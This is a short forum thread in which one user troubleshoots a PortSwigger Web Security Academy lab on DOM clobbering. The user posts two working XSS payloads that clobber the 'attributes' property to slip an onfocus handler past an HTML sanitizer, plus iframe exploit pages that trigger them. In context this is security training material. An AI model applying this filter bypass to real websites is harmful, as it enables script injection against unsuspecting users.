
Burp Suite User Forum


Lab "Clobbering DOM attributes to bypass HTML filters" is not getting solved

Aakash | Last updated: Oct 08, 2024 08:04PM UTC

The exploit below is working for me and I get the popup, but when delivering it to the victim the lab is not getting solved.

Payload:

    <form id=x tabindex=1 onfocus=alert(1)><input id=attributes></form>

Exploit:

    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Clobbering DOM attributes to bypass HTML filters</title>
    </head>
    <body>
      <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=9" onload="setTimeout(()=>this.src=this.src+'#x',5000)"></iframe>
    </body>
    </html>

Aakash | Last updated: Oct 08, 2024 08:05PM UTC

Also tried 500ms, 1000ms, up to 5000ms. Same issue.

Aakash | Last updated: Oct 08, 2024 08:35PM UTC

Also tried with the payload and exploit below.

Payload:

    <form id=x tabindex=1 onfocus=print()><input id=attributes></form>

Exploit:

    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Clobbering DOM attributes to bypass HTML filters</title>
    </head>
    <body>
      <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=7" onload="setTimeout(()=>{ this.src=this.src+'#x'; },1000)"></iframe>
    </body>
    </html>

Aakash | Last updated: Oct 08, 2024 08:39PM UTC

It has been solved after multiple "Deliver exploit to victim". Thanks
